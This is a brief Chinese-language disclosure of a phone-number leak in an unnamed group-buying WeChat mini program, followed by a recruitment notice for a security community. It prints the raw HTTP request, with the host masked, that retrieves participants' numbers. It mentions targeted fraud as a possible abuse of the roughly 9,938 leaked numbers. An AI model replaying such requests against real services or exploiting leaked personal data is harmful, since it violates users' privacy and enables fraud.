某拼團小程式存在系統資訊洩露漏洞
以下為漏洞詳情
資料包:
GET /zinfo/tail?initiateId=4&target=2 HTTP/1.1Host: xxxxxAccept: application/json, text/plain, */*Xweb_xhr: 1Authorization: NTc3ODU0MzRFODVGNDRENkY0NzE0MDMwREU1NTc3NERDMkYzNUU0NDNCN0E1NDRENDQ3NzZBQjgxMTA4OUEyNA==User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090c33)XWEB/13487Content-Type: application/x-www-form-urlencodedSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://servicewechat.com/wx90229e983b201cf1/109/page-frame.htmlAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Priority: u=1, iConnection: keep-alive從手機號尾數可得洩露號碼為第一個拼團使用者號碼
9938個電話號碼
由於使用者均為參加拼團使用者,且為未拼團成功的使用者可利用這一點進行定點詐騙等添加個人資訊微信。
最後,歡迎來自不同背景的師傅加入我們,一起打造一個活躍的交流社群,在SNL社群沒有背景、能力的差異,我們歡迎大家一起學習進步。
我們是一支多元化的安全技術團隊,成員活躍在滲透測試、漏洞挖掘、逆向工程等多個安全領域。日常社群氛圍充滿技術熱情:大家會一起分析最新漏洞案例,組織內部滲透測試實戰,協作開發安全研究專案。
團隊定期開展技術分享會,從Web安全到二進位制漏洞,從CTF解題技巧到企業級安全防護,各種技術話題都能在這裡碰撞出火花。如果你也熱衷於安全技術的實踐與交流,歡迎加入我們一起成長!